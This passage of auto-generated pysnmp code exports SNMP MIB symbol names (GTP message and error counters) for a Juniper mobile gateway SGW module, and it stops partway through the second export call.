mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwBrResFlrIndRx=jnxMbgSgwBrResFlrIndRx, jnxMbgSgwPPModBrReqTx=jnxMbgSgwPPModBrReqTx, jnxMbgSgwIfDlDataAckRx=jnxMbgSgwIfDlDataAckRx, jnxMbgSgwIfGtpV2ICsUENotRespTx=jnxMbgSgwIfGtpV2ICsUENotRespTx, jnxMbgSgwGtpV2ICsRelocFailRx=jnxMbgSgwGtpV2ICsRelocFailRx, jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx=jnxMbgSgwPPGtpV2ICsNOTFTUECTXTx, jnxMbgSgwDelConnSetRspRx=jnxMbgSgwDelConnSetRspRx, jnxMbgSgwGtpV1EndMarkerTx=jnxMbgSgwGtpV1EndMarkerTx, jnxMbgSgwPPSuspNotifRx=jnxMbgSgwPPSuspNotifRx, jnxMbgSgwGtpV2ICsUnexpRptIETx=jnxMbgSgwGtpV2ICsUnexpRptIETx, jnxMbgSgwIfGtpV2ICsReqRejRx=jnxMbgSgwIfGtpV2ICsReqRejRx, jnxMbgSgwModBrRspTx=jnxMbgSgwModBrRspTx, jnxMbgSgwGtpV2ICsAcceptPartRx=jnxMbgSgwGtpV2ICsAcceptPartRx, jnxMbgSgwIfSuspNotifRx=jnxMbgSgwIfSuspNotifRx, jnxMbgSgwPPV2NumMsgTx=jnxMbgSgwPPV2NumMsgTx, jnxMbgSgwPPGtpV2ICsNoMemTx=jnxMbgSgwPPGtpV2ICsNoMemTx, jnxMbgSgwIfGtpV2ICsReqAcceptRx=jnxMbgSgwIfGtpV2ICsReqAcceptRx, jnxMbgSgwPPPcktLenErrRx=jnxMbgSgwPPPcktLenErrRx, jnxMbgSgwBrResCmdTx=jnxMbgSgwBrResCmdTx, jnxMbgSgwIfGtpV2ICsCondIEMsTx=jnxMbgSgwIfGtpV2ICsCondIEMsTx, jnxMbgSgwGtpV2ICsInvLenRx=jnxMbgSgwGtpV2ICsInvLenRx, jnxMbgSgwPPGtpV1T3RespTmrExpRx=jnxMbgSgwPPGtpV1T3RespTmrExpRx, jnxMbgSgwPPGtpV2ICsRMValRcvRx=jnxMbgSgwPPGtpV2ICsRMValRcvRx, jnxMbgSgwS5PiggybackMsgTx=jnxMbgSgwS5PiggybackMsgTx, jnxMbgSgwIfDelIndTunReqTx=jnxMbgSgwIfDelIndTunReqTx, jnxMbgSgwIfDelBrCmdTx=jnxMbgSgwIfDelBrCmdTx, jnxMbgSgwIfGtpV2ICsMisUnknAPNRx=jnxMbgSgwIfGtpV2ICsMisUnknAPNRx, jnxMbgSgwPPGtpV2ICsNoMemRx=jnxMbgSgwPPGtpV2ICsNoMemRx, jnxMbgSgwPPUpdConnSetReqRx=jnxMbgSgwPPUpdConnSetReqRx, jnxMbgSgwDlDataNotiFlrIndRx=jnxMbgSgwDlDataNotiFlrIndRx, jnxMbgSgwPPDlDataNotiFlrIndRx=jnxMbgSgwPPDlDataNotiFlrIndRx, jnxMbgSgwIfV2VerNotSupTx=jnxMbgSgwIfV2VerNotSupTx, jnxMbgSgwPPGtpV2ICsIMSINotKnRx=jnxMbgSgwPPGtpV2ICsIMSINotKnRx, jnxMbgSgwPPRelAcsBrReqRx=jnxMbgSgwPPRelAcsBrReqRx, jnxMbgSgwPPGtpV2ICsInReFRePrRx=jnxMbgSgwPPGtpV2ICsInReFRePrRx, 
jnxMbgSgwGtpV2ICsPageRx=jnxMbgSgwGtpV2ICsPageRx, jnxMbgSgwIfResumeNotifTx=jnxMbgSgwIfResumeNotifTx, jnxMbgSgwPPGtpV2ICsUnabPageUERx=jnxMbgSgwPPGtpV2ICsUnabPageUERx, jnxMbgSgwIfRxPacketsDropped=jnxMbgSgwIfRxPacketsDropped, jnxMbgSgwGtpV1EchoRespTx=jnxMbgSgwGtpV1EchoRespTx, jnxMbgSgwPPGtpV2ICsUserAUTHFlRx=jnxMbgSgwPPGtpV2ICsUserAUTHFlRx, jnxMbgSgwIfCreateSessReqTx=jnxMbgSgwIfCreateSessReqTx, jnxMbgSgwPPDelIndTunReqTx=jnxMbgSgwPPDelIndTunReqTx, jnxMbgSgwIfDelIndTunReqRx=jnxMbgSgwIfDelIndTunReqRx, jnxMbgSgwPPGtpV2ICsAcceptPartRx=jnxMbgSgwPPGtpV2ICsAcceptPartRx, jnxMbgSgwPPV2EchoRespTx=jnxMbgSgwPPV2EchoRespTx, jnxMbgSgwPPGtpV2ICsColNWReqTx=jnxMbgSgwPPGtpV2ICsColNWReqTx, jnxMbgSgwGtpV2ICsCondIEMsRx=jnxMbgSgwGtpV2ICsCondIEMsRx, jnxMbgSgwGTPPortErrRx=jnxMbgSgwGTPPortErrRx, jnxMbgSgwIfGtpV2ICsInReFRePrRx=jnxMbgSgwIfGtpV2ICsInReFRePrRx, jnxMbgSgwPPGtpV2ICsPkFltSynErTx=jnxMbgSgwPPGtpV2ICsPkFltSynErTx, jnxMbgSgwIfGtpV2ICsUENotRespRx=jnxMbgSgwIfGtpV2ICsUENotRespRx, jnxMbgSgwDelBrRspRx=jnxMbgSgwDelBrRspRx, jnxMbgSgwIfType=jnxMbgSgwIfType, jnxMbgSgwIfGtpV2ICsServDeniedTx=jnxMbgSgwIfGtpV2ICsServDeniedTx, jnxMbgSgwSuspAckRx=jnxMbgSgwSuspAckRx, jnxMbgSgwPPGtpV2ICsManIEIncorTx=jnxMbgSgwPPGtpV2ICsManIEIncorTx, jnxMbgSgwIfGtpV2ICsISRDeactRx=jnxMbgSgwIfGtpV2ICsISRDeactRx, jnxMbgSgwGtpIfStatsEntry=jnxMbgSgwGtpIfStatsEntry, jnxMbgSgwIfGtpV2ICsServDeniedRx=jnxMbgSgwIfGtpV2ICsServDeniedRx, jnxMbgSgwGtpV2ICsNoResTx=jnxMbgSgwGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsReqAcceptRx=jnxMbgSgwPPGtpV2ICsReqAcceptRx, jnxMbgSgwDelBrCmdTx=jnxMbgSgwDelBrCmdTx, jnxMbgSgwGtpV2ICsNoMemRx=jnxMbgSgwGtpV2ICsNoMemRx, jnxMbgSgwGtpV2ICsUnPgUESusTx=jnxMbgSgwGtpV2ICsUnPgUESusTx, jnxMbgSgwIfDelConnSetRspRx=jnxMbgSgwIfDelConnSetRspRx, jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx=jnxMbgSgwIfGtpV2ICsNOTFTUECTXTx, jnxMbgSgwPPDelIndTunReqRx=jnxMbgSgwPPDelIndTunReqRx, jnxMbgSgwIfGtpV2ICsPTNotSuppTx=jnxMbgSgwIfGtpV2ICsPTNotSuppTx, jnxMbgSgwCrtBrRspRx=jnxMbgSgwCrtBrRspRx, jnxMbgSgwGtpV2ICsInvLenTx=jnxMbgSgwGtpV2ICsInvLenTx, 
jnxMbgSgwGtpV2ICsNewPTNPrefRx=jnxMbgSgwGtpV2ICsNewPTNPrefRx, jnxMbgSgwGtpV2ICsIMSINotKnRx=jnxMbgSgwGtpV2ICsIMSINotKnRx, jnxMbgSgwIfCreateSessRspRx=jnxMbgSgwIfCreateSessRspRx, jnxMbgSgwIfDelSessRspRx=jnxMbgSgwIfDelSessRspRx, jnxMbgSgwGtpV2ICsEIFRNCEnTx=jnxMbgSgwGtpV2ICsEIFRNCEnTx, jnxMbgSgwIfBrResFlrIndRx=jnxMbgSgwIfBrResFlrIndRx, jnxMbgSgwIfGtpV2ICsColNWReqRx=jnxMbgSgwIfGtpV2ICsColNWReqRx, jnxMbgSgwIfProtocolErrRx=jnxMbgSgwIfProtocolErrRx, jnxMbgSgwGtpV2ICsInvPrTx=jnxMbgSgwGtpV2ICsInvPrTx, jnxMbgSgwGtpNotifications=jnxMbgSgwGtpNotifications, jnxMbgSgwGtpV2ICsPkFltManErrTx=jnxMbgSgwGtpV2ICsPkFltManErrTx, jnxMbgSgwPPGtpV2ICsNewPTNPrefRx=jnxMbgSgwPPGtpV2ICsNewPTNPrefRx, jnxMbgSgwGtpV2ICsRPrNtRspTx=jnxMbgSgwGtpV2ICsRPrNtRspTx, jnxMbgSgwRelAcsBrRespTx=jnxMbgSgwRelAcsBrRespTx, jnxMbgSgwGtpV2ICsAPNResTIncTx=jnxMbgSgwGtpV2ICsAPNResTIncTx, jnxMbgSgwPPGtpV2ICsCondIEMsTx=jnxMbgSgwPPGtpV2ICsCondIEMsTx, jnxMbgSgwUpdConnSetReqTx=jnxMbgSgwUpdConnSetReqTx, jnxMbgSgwPPGtpV2ICsAPNResTIncRx=jnxMbgSgwPPGtpV2ICsAPNResTIncRx, jnxMbgSgwGtpV2ICsServNotSuppTx=jnxMbgSgwGtpV2ICsServNotSuppTx, jnxMbgSgwUpdBrRspRx=jnxMbgSgwUpdBrRspRx, jnxMbgSgwDelIndTunReqTx=jnxMbgSgwDelIndTunReqTx, jnxMbgSgwIfGtpV2ICsNewPTNPrefRx=jnxMbgSgwIfGtpV2ICsNewPTNPrefRx, jnxMbgSgwDelConnSetReqRx=jnxMbgSgwDelConnSetReqRx, jnxMbgSgwGtpV2ICsInvPrRx=jnxMbgSgwGtpV2ICsInvPrRx, jnxMbgSgwIfGtpV1EndMarkerTx=jnxMbgSgwIfGtpV1EndMarkerTx, jnxMbgSgwBrResFlrIndTx=jnxMbgSgwBrResFlrIndTx, jnxMbgSgwIPVerErrRx=jnxMbgSgwIPVerErrRx, jnxMbgSgwIfGtpV1T3RespTmrExpRx=jnxMbgSgwIfGtpV1T3RespTmrExpRx, jnxMbgSgwIfModBrRspTx=jnxMbgSgwIfModBrRspTx, jnxMbgSgwPPGtpV2ICsProtoNtSupTx=jnxMbgSgwPPGtpV2ICsProtoNtSupTx, jnxMbgSgwIfGtpV2ICsInvMsgFmtTx=jnxMbgSgwIfGtpV2ICsInvMsgFmtTx, jnxMbgSgwPPSuspAckTx=jnxMbgSgwPPSuspAckTx, jnxMbgSgwGtpV2ICsNOTFTUECTXRx=jnxMbgSgwGtpV2ICsNOTFTUECTXRx, jnxMbgSgwPPGtpV2ICsOptIEIncorRx=jnxMbgSgwPPGtpV2ICsOptIEIncorRx, jnxMbgSgwUpdConnSetRspRx=jnxMbgSgwUpdConnSetRspRx, jnxMbgSgwGtpV2ICsPTNotSuppRx=jnxMbgSgwGtpV2ICsPTNotSuppRx, 
jnxMbgSgwPPGtpV2ICsAPNAcsDenRx=jnxMbgSgwPPGtpV2ICsAPNAcsDenRx, jnxMbgSgwPPGtpV2ICsUnexpRptIERx=jnxMbgSgwPPGtpV2ICsUnexpRptIERx, jnxMbgSgwCreateSessRspRx=jnxMbgSgwCreateSessRspRx, jnxMbgSgwIfGtpV1UnSupMsgRx=jnxMbgSgwIfGtpV1UnSupMsgRx, jnxMbgSgwUpdBrReqTx=jnxMbgSgwUpdBrReqTx, jnxMbgSgwPPGtpV2ICsServNotSupRx=jnxMbgSgwPPGtpV2ICsServNotSupRx, jnxMbgSgwIfGtpV2ICsUERefusesRx=jnxMbgSgwIfGtpV2ICsUERefusesRx, jnxMbgSgwPPGtpV2ICsRPrNtRspTx=jnxMbgSgwPPGtpV2ICsRPrNtRspTx, jnxMbgSgwIfGtpV1EchoReqTx=jnxMbgSgwIfGtpV1EchoReqTx, jnxMbgSgwPPGtpV2ICsCmpDetRx=jnxMbgSgwPPGtpV2ICsCmpDetRx, jnxMbgSgwCrIndTunRespRx=jnxMbgSgwCrIndTunRespRx, jnxMbgSgwIfGtpV2ICsOptIEIncorRx=jnxMbgSgwIfGtpV2ICsOptIEIncorRx, jnxMbgSgwPPGtpV2ICsCmpDetTx=jnxMbgSgwPPGtpV2ICsCmpDetTx, jnxMbgSgwGtpAlarmStatCounter=jnxMbgSgwGtpAlarmStatCounter, jnxMbgSgwPPV2EchoReqRx=jnxMbgSgwPPV2EchoReqRx, jnxMbgSgwDlDataAckRx=jnxMbgSgwDlDataAckRx, jnxMbgSgwIfIPVerErrRx=jnxMbgSgwIfIPVerErrRx, jnxMbgSgwPPStopPagingIndRx=jnxMbgSgwPPStopPagingIndRx, jnxMbgSgwGtpV2ICsInvTotLenTx=jnxMbgSgwGtpV2ICsInvTotLenTx, jnxMbgSgwIfModBrReqTx=jnxMbgSgwIfModBrReqTx, jnxMbgSgwGtpV1ProtocolErrRx=jnxMbgSgwGtpV1ProtocolErrRx, jnxMbgSgwGtpV2ICsUENotRespRx=jnxMbgSgwGtpV2ICsUENotRespRx, jnxMbgSgwIfGtpV2ICsManIEIncorRx=jnxMbgSgwIfGtpV2ICsManIEIncorRx, jnxMbgSgwPPGtpV2ICsUnexpRptIETx=jnxMbgSgwPPGtpV2ICsUnexpRptIETx, jnxMbgSgwIfGtpV2ICsPkFltSynErRx=jnxMbgSgwIfGtpV2ICsPkFltSynErRx, jnxMbgSgwPPDlDataNotifRx=jnxMbgSgwPPDlDataNotifRx, jnxMbgSgwGtpV2ICsCondIEMsTx=jnxMbgSgwGtpV2ICsCondIEMsTx, jnxMbgSgwDelIndTunRespTx=jnxMbgSgwDelIndTunRespTx, jnxMbgSgwPPGtpV2ICsDenINRatRx=jnxMbgSgwPPGtpV2ICsDenINRatRx, jnxMbgSgwGtpPeerGwDnNotif=jnxMbgSgwGtpPeerGwDnNotif, jnxMbgSgwGtpV2ICsPkFltManErrRx=jnxMbgSgwGtpV2ICsPkFltManErrRx, jnxMbgSgwV2NumMsgRx=jnxMbgSgwV2NumMsgRx, jnxMbgSgwPPModBrFlrIndTx=jnxMbgSgwPPModBrFlrIndTx, jnxMbgSgwIfUpdConnSetReqRx=jnxMbgSgwIfUpdConnSetReqRx, jnxMbgSgwGtpObjects=jnxMbgSgwGtpObjects, jnxMbgSgwGtpV2ICsSynErTADTx=jnxMbgSgwGtpV2ICsSynErTADTx, 
jnxMbgSgwIfPacketAllocFail=jnxMbgSgwIfPacketAllocFail, jnxMbgSgwIfCreateSessReqRx=jnxMbgSgwIfCreateSessReqRx, jnxMbgSgwPPCrIndTunReqRx=jnxMbgSgwPPCrIndTunReqRx, jnxMbgSgwCrtBrRspTx=jnxMbgSgwCrtBrRspTx, jnxMbgSgwPPV2NumBytesTx=jnxMbgSgwPPV2NumBytesTx, jnxMbgSgwGtpIfStatsTable=jnxMbgSgwGtpIfStatsTable, jnxMbgSgwGtpV2ICsColNWReqRx=jnxMbgSgwGtpV2ICsColNWReqRx, jnxMbgSgwPPGtpV2ICsUserAUTHFlTx=jnxMbgSgwPPGtpV2ICsUserAUTHFlTx, jnxMbgSgwIfGtpV2ICsEIFRNCEnTx=jnxMbgSgwIfGtpV2ICsEIFRNCEnTx, jnxMbgSgwPPV2EchoReqTx=jnxMbgSgwPPV2EchoReqTx, jnxMbgSgwDlDataNotifRx=jnxMbgSgwDlDataNotifRx, jnxMbgSgwPPGtpV2ICsRPrNtRspRx=jnxMbgSgwPPGtpV2ICsRPrNtRspRx, jnxMbgSgwS11PiggybackMsgRx=jnxMbgSgwS11PiggybackMsgRx, jnxMbgSgwPPGtpV2ICsSysFailRx=jnxMbgSgwPPGtpV2ICsSysFailRx, jnxMbgSgwGtpV2ICsVerNotSuppRx=jnxMbgSgwGtpV2ICsVerNotSuppRx, jnxMbgSgwDlDataAckTx=jnxMbgSgwDlDataAckTx, jnxMbgSgwPPGtpV2ICsCtxNotFndRx=jnxMbgSgwPPGtpV2ICsCtxNotFndRx, jnxMbgSgwIfGtpV2ICsAlDynAdOccTx=jnxMbgSgwIfGtpV2ICsAlDynAdOccTx, jnxMbgSgwPPGtpV1ProtocolErrRx=jnxMbgSgwPPGtpV1ProtocolErrRx, jnxMbgSgwModBrCmdTx=jnxMbgSgwModBrCmdTx, jnxMbgSgwPPProtocolErrRx=jnxMbgSgwPPProtocolErrRx, jnxMbgSgwPPRelAcsBrReqTx=jnxMbgSgwPPRelAcsBrReqTx, jnxMbgSgwGtpV1UnSupMsgRx=jnxMbgSgwGtpV1UnSupMsgRx, jnxMbgSgwResumeAckTx=jnxMbgSgwResumeAckTx, jnxMbgSgwIfGtpV2ICsSysFailTx=jnxMbgSgwIfGtpV2ICsSysFailTx, jnxMbgSgwIfV2EchoReqTx=jnxMbgSgwIfV2EchoReqTx, jnxMbgSgwIfGtpV2ICsRMValRcvRx=jnxMbgSgwIfGtpV2ICsRMValRcvRx, jnxMbgSgwPPUpdBrRspTx=jnxMbgSgwPPUpdBrRspTx, jnxMbgSgwIfGtpV2ICsSynErTADRx=jnxMbgSgwIfGtpV2ICsSynErTADRx, jnxMbgSgwPPSuspAckRx=jnxMbgSgwPPSuspAckRx, jnxMbgSgwProtocolErrRx=jnxMbgSgwProtocolErrRx, jnxMbgSgwCrtBrReqTx=jnxMbgSgwCrtBrReqTx, jnxMbgSgwIfCrtBrReqRx=jnxMbgSgwIfCrtBrReqRx, jnxMbgSgwIfGtpV2ICsProtoNtSupTx=jnxMbgSgwIfGtpV2ICsProtoNtSupTx, jnxMbgSgwIfGtpV2ICsUserAUTHFlRx=jnxMbgSgwIfGtpV2ICsUserAUTHFlRx, jnxMbgSgwGtpV2ICsSemErTADTx=jnxMbgSgwGtpV2ICsSemErTADTx, jnxMbgSgwGtpV2ICsSysFailTx=jnxMbgSgwGtpV2ICsSysFailTx, 
jnxMbgSgwGtpV2ICsDtForNtSupTx=jnxMbgSgwGtpV2ICsDtForNtSupTx, jnxMbgSgwPPDelBrFlrIndRx=jnxMbgSgwPPDelBrFlrIndRx, jnxMbgSgwPPGtpV2ICsUnPgUESusTx=jnxMbgSgwPPGtpV2ICsUnPgUESusTx, jnxMbgSgwGtpV2ICsManIEMissTx=jnxMbgSgwGtpV2ICsManIEMissTx, jnxMbgSgwCreateSessReqTx=jnxMbgSgwCreateSessReqTx, jnxMbgSgwPPUpdBrReqTx=jnxMbgSgwPPUpdBrReqTx, jnxMbgSgwIfPiggybackMsgTx=jnxMbgSgwIfPiggybackMsgTx, jnxMbgSgwIfResumeAckRx=jnxMbgSgwIfResumeAckRx, jnxMbgSgwPPGtpV2ICsPageRx=jnxMbgSgwPPGtpV2ICsPageRx, jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx=jnxMbgSgwIfGtpV2ICsNOTFTUECTXRx, jnxMbgSgwIfGtpV2ICsInvTotLenRx=jnxMbgSgwIfGtpV2ICsInvTotLenRx, jnxMbgSgwGTPUnknVerRx=jnxMbgSgwGTPUnknVerRx, jnxMbgSgwV2EchoReqTx=jnxMbgSgwV2EchoReqTx, jnxMbgSgwPPGtpV2ICsManIEMissTx=jnxMbgSgwPPGtpV2ICsManIEMissTx, jnxMbgSgwIfGtpV2ICsAPNResTIncRx=jnxMbgSgwIfGtpV2ICsAPNResTIncRx, jnxMbgSgwIfDlDataNotiFlrIndRx=jnxMbgSgwIfDlDataNotiFlrIndRx, jnxMbgSgwPPGtpV2ICsInvTotLenTx=jnxMbgSgwPPGtpV2ICsInvTotLenTx, jnxMbgSgwGtpV2ICsMisUnknAPNRx=jnxMbgSgwGtpV2ICsMisUnknAPNRx, jnxMbgSgwModBrReqRx=jnxMbgSgwModBrReqRx, jnxMbgSgwModBrReqTx=jnxMbgSgwModBrReqTx, jnxMbgSgwIfGtpV2ICsReqRejTx=jnxMbgSgwIfGtpV2ICsReqRejTx, jnxMbgSgwIfRelAcsBrRespTx=jnxMbgSgwIfRelAcsBrRespTx, jnxMbgSgwCrIndTunReqRx=jnxMbgSgwCrIndTunReqRx, jnxMbgSgwIfGtpV2ICsProtoNtSupRx=jnxMbgSgwIfGtpV2ICsProtoNtSupRx, jnxMbgSgwPPDelBrRspRx=jnxMbgSgwPPDelBrRspRx, jnxMbgSgwPPGtpV2ICsLclDetTx=jnxMbgSgwPPGtpV2ICsLclDetTx, jnxMbgSgwIfGtpV2ICsIMSINotKnRx=jnxMbgSgwIfGtpV2ICsIMSINotKnRx, jnxMbgSgwIfRelAcsBrRespRx=jnxMbgSgwIfRelAcsBrRespRx, jnxMbgSgwPPV2VerNotSupTx=jnxMbgSgwPPV2VerNotSupTx, jnxMbgSgwIfGtpV2ICsPTMSISigMMTx=jnxMbgSgwIfGtpV2ICsPTMSISigMMTx, jnxMbgSgwIfGtpV2ICsRATChgRx=jnxMbgSgwIfGtpV2ICsRATChgRx, jnxMbgSgwGtpGwName=jnxMbgSgwGtpGwName, jnxMbgSgwPPGtpV2ICsUnabPageUETx=jnxMbgSgwPPGtpV2ICsUnabPageUETx, jnxMbgSgwGtpV2ICsNewPTSIAdbrTx=jnxMbgSgwGtpV2ICsNewPTSIAdbrTx, jnxMbgSgwSuspNotifRx=jnxMbgSgwSuspNotifRx, jnxMbgSgwPPV2VerNotSupRx=jnxMbgSgwPPV2VerNotSupRx, 
jnxMbgSgwIfGtpV2ICsNoMemRx=jnxMbgSgwIfGtpV2ICsNoMemRx, jnxMbgSgwDelBrRspTx=jnxMbgSgwDelBrRspTx, jnxMbgSgwIfGtpV2ICsSynErTADTx=jnxMbgSgwIfGtpV2ICsSynErTADTx, jnxMbgSgwIfIPProtoErrRx=jnxMbgSgwIfIPProtoErrRx, jnxMbgSgwIfGtpV1EchoRespRx=jnxMbgSgwIfGtpV1EchoRespRx, jnxMbgSgwPPGtpV2ICsInvLenTx=jnxMbgSgwPPGtpV2ICsInvLenTx, jnxMbgSgwSuspNotifTx=jnxMbgSgwSuspNotifTx, jnxMbgSgwPPGtpV2ICsColNWReqRx=jnxMbgSgwPPGtpV2ICsColNWReqRx, jnxMbgSgwIfGtpV2ICsCtxNotFndTx=jnxMbgSgwIfGtpV2ICsCtxNotFndTx, jnxMbgSgwIfGtpV1ErrIndRx=jnxMbgSgwIfGtpV1ErrIndRx, jnxMbgSgwPPDelConnSetReqTx=jnxMbgSgwPPDelConnSetReqTx, jnxMbgSgwPPGtpV1EchoRespTx=jnxMbgSgwPPGtpV1EchoRespTx, jnxMbgSgwPPGtpV2ICsServDeniedTx=jnxMbgSgwPPGtpV2ICsServDeniedTx, jnxMbgSgwGtpV2ICsUnknownTx=jnxMbgSgwGtpV2ICsUnknownTx, jnxMbgSgwPPDelConnSetReqRx=jnxMbgSgwPPDelConnSetReqRx, jnxMbgSgwIfDelIndTunRespTx=jnxMbgSgwIfDelIndTunRespTx, jnxMbgSgwIfPiggybackMsgRx=jnxMbgSgwIfPiggybackMsgRx, jnxMbgSgwIfDelBrCmdRx=jnxMbgSgwIfDelBrCmdRx, jnxMbgSgwGtpV1EchoRespRx=jnxMbgSgwGtpV1EchoRespRx, jnxMbgSgwPPGtpLclAddr=jnxMbgSgwPPGtpLclAddr, jnxMbgSgwPPGtpV2ICsPkFltSynErRx=jnxMbgSgwPPGtpV2ICsPkFltSynErRx, jnxMbgSgwPPGtpV2ICsRelocFailTx=jnxMbgSgwPPGtpV2ICsRelocFailTx, jnxMbgSgwGtpV2ICsAPNAcsDenRx=jnxMbgSgwGtpV2ICsAPNAcsDenRx, jnxMbgSgwIfGtpV2ICsUnknownTx=jnxMbgSgwIfGtpV2ICsUnknownTx, jnxMbgSgwPPDelSessRspRx=jnxMbgSgwPPDelSessRspRx, jnxMbgSgwPPGtpV2ICsNewPTNPrefTx=jnxMbgSgwPPGtpV2ICsNewPTNPrefTx, jnxMbgSgwV2EchoRespTx=jnxMbgSgwV2EchoRespTx, jnxMbgSgwPPGtpV2ICsVerNotSuppTx=jnxMbgSgwPPGtpV2ICsVerNotSuppTx, jnxMbgSgwResumeNotifTx=jnxMbgSgwResumeNotifTx, jnxMbgSgwPPCrtBrRspTx=jnxMbgSgwPPCrtBrRspTx, jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx=jnxMbgSgwPPGtpV2ICsGREKeyNtFdRx, jnxMbgSgwPPGtpV2ICsManIEIncorRx=jnxMbgSgwPPGtpV2ICsManIEIncorRx, jnxMbgSgwIfDlDataNotifRx=jnxMbgSgwIfDlDataNotifRx, jnxMbgSgwIfDelConnSetReqRx=jnxMbgSgwIfDelConnSetReqRx, jnxMbgSgwGtpV2ICsAPNResTIncRx=jnxMbgSgwGtpV2ICsAPNResTIncRx, jnxMbgSgwIfGtpV1ProtocolErrRx=jnxMbgSgwIfGtpV1ProtocolErrRx, 
jnxMbgSgwIfUpdBrRspTx=jnxMbgSgwIfUpdBrRspTx, jnxMbgSgwPPGtpV2ICsTFTSysErrRx=jnxMbgSgwPPGtpV2ICsTFTSysErrRx)
mibBuilder.exportSymbols("JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB", jnxMbgSgwResumeNotifRx=jnxMbgSgwResumeNotifRx, jnxMbgSgwIfV2EchoReqRx=jnxMbgSgwIfV2EchoReqRx, jnxMbgSgwSuspAckTx=jnxMbgSgwSuspAckTx, jnxMbgSgwGtpV1EndMarkerRx=jnxMbgSgwGtpV1EndMarkerRx, jnxMbgSgwIfGtpV2ICsNoMemTx=jnxMbgSgwIfGtpV2ICsNoMemTx, jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx=jnxMbgSgwPPGtpV2ICsNPTSIAdbrRx, jnxMbgSgwPPGtpV1EndMarkerTx=jnxMbgSgwPPGtpV1EndMarkerTx, jnxMbgSgwPPGtpV2ICsReqRejRx=jnxMbgSgwPPGtpV2ICsReqRejRx, jnxMbgSgwIfSuspAckRx=jnxMbgSgwIfSuspAckRx, jnxMbgSgwIfGtpV2ICsNoResRx=jnxMbgSgwIfGtpV2ICsNoResRx, jnxMbgSgwIfGtpV2ICsInvPrTx=jnxMbgSgwIfGtpV2ICsInvPrTx, jnxMbgSgwGtpV2ICsMisUnknAPNTx=jnxMbgSgwGtpV2ICsMisUnknAPNTx, jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx=jnxMbgSgwIfGtpV2ICsNPTSIAdbrTx, jnxMbgSgwPPGtpV2ICsEIFRNCEnRx=jnxMbgSgwPPGtpV2ICsEIFRNCEnRx, jnxMbgSgwUpdConnSetReqRx=jnxMbgSgwUpdConnSetReqRx, jnxMbgSgwGtpV2ICsAllDynAdOccTx=jnxMbgSgwGtpV2ICsAllDynAdOccTx, jnxMbgSgwIfResumeNotifRx=jnxMbgSgwIfResumeNotifRx, jnxMbgSgwGtpV2ICsRATChgTx=jnxMbgSgwGtpV2ICsRATChgTx, jnxMbgSgwGtpV1ErrIndTx=jnxMbgSgwGtpV1ErrIndTx, jnxMbgSgwIfSuspNotifTx=jnxMbgSgwIfSuspNotifTx, jnxMbgSgwIfGtpV2ICsAlDynAdOccRx=jnxMbgSgwIfGtpV2ICsAlDynAdOccRx, jnxMbgSgwIfUnknMsgRx=jnxMbgSgwIfUnknMsgRx, jnxMbgSgwPPDlDataAckRx=jnxMbgSgwPPDlDataAckRx, jnxMbgSgwIfGtpV2ICsNoResTx=jnxMbgSgwIfGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsTFTSMANTErTx=jnxMbgSgwPPGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfGtpV2ICsTFTSMANTErTx=jnxMbgSgwIfGtpV2ICsTFTSMANTErTx, jnxMbgSgwIfV2NumBytesRx=jnxMbgSgwIfV2NumBytesRx, jnxMbgSgwPPPacketSendFail=jnxMbgSgwPPPacketSendFail, jnxMbgSgwModBrRspRx=jnxMbgSgwModBrRspRx, jnxMbgSgwPPCrIndTunReqTx=jnxMbgSgwPPCrIndTunReqTx, jnxMbgSgwRelAcsBrReqRx=jnxMbgSgwRelAcsBrReqRx, jnxMbgSgwPPGtpV2ICsCondIEMsRx=jnxMbgSgwPPGtpV2ICsCondIEMsRx, jnxMbgSgwIfDelBrFlrIndRx=jnxMbgSgwIfDelBrFlrIndRx, jnxMbgSgwV2NumBytesRx=jnxMbgSgwV2NumBytesRx, jnxMbgSgwPPGtpV2ICsUENotRespRx=jnxMbgSgwPPGtpV2ICsUENotRespRx, jnxMbgSgwPPGtpV2ICsDtForNtSupTx=jnxMbgSgwPPGtpV2ICsDtForNtSupTx, 
jnxMbgSgwGtpNotificationVars=jnxMbgSgwGtpNotificationVars, jnxMbgSgwPPV2EchoRespRx=jnxMbgSgwPPV2EchoRespRx, jnxMbgSgwPPGtpV2ICsTFTSysErrTx=jnxMbgSgwPPGtpV2ICsTFTSysErrTx, jnxMbgSgwGtpV2ICsVerNotSuppTx=jnxMbgSgwGtpV2ICsVerNotSuppTx, jnxMbgSgwIfGtpV1EchoReqRx=jnxMbgSgwIfGtpV1EchoReqRx, jnxMbgSgwIfCreateSessRspTx=jnxMbgSgwIfCreateSessRspTx, jnxMbgSgwGtpPerPeerStatsEntry=jnxMbgSgwGtpPerPeerStatsEntry, jnxMbgSgwPPGtpV2ICsUnknownTx=jnxMbgSgwPPGtpV2ICsUnknownTx, jnxMbgSgwIfGtpV2ICsPTMSISigMMRx=jnxMbgSgwIfGtpV2ICsPTMSISigMMRx, jnxMbgSgwGtpGwIndex=jnxMbgSgwGtpGwIndex, jnxMbgSgwModBrCmdRx=jnxMbgSgwModBrCmdRx, jnxMbgSgwPPDelSessRspTx=jnxMbgSgwPPDelSessRspTx, jnxMbgSgwIfV2NumMsgRx=jnxMbgSgwIfV2NumMsgRx, jnxMbgSgwIfBrResCmdRx=jnxMbgSgwIfBrResCmdRx, jnxMbgSgwPPGtpV2ICsAllDynAdOcTx=jnxMbgSgwPPGtpV2ICsAllDynAdOcTx, jnxMbgSgwIfV2VerNotSupRx=jnxMbgSgwIfV2VerNotSupRx, jnxMbgSgwPPGtpV2ICsPageTx=jnxMbgSgwPPGtpV2ICsPageTx, jnxMbgSgwPPGtpV2ICsSemErTADTx=jnxMbgSgwPPGtpV2ICsSemErTADTx, jnxMbgSgwPPResumeAckRx=jnxMbgSgwPPResumeAckRx, jnxMbgSgwGtpV2ICsPTNotSuppTx=jnxMbgSgwGtpV2ICsPTNotSuppTx, jnxMbgSgwGtpV2ICsSysFailRx=jnxMbgSgwGtpV2ICsSysFailRx, 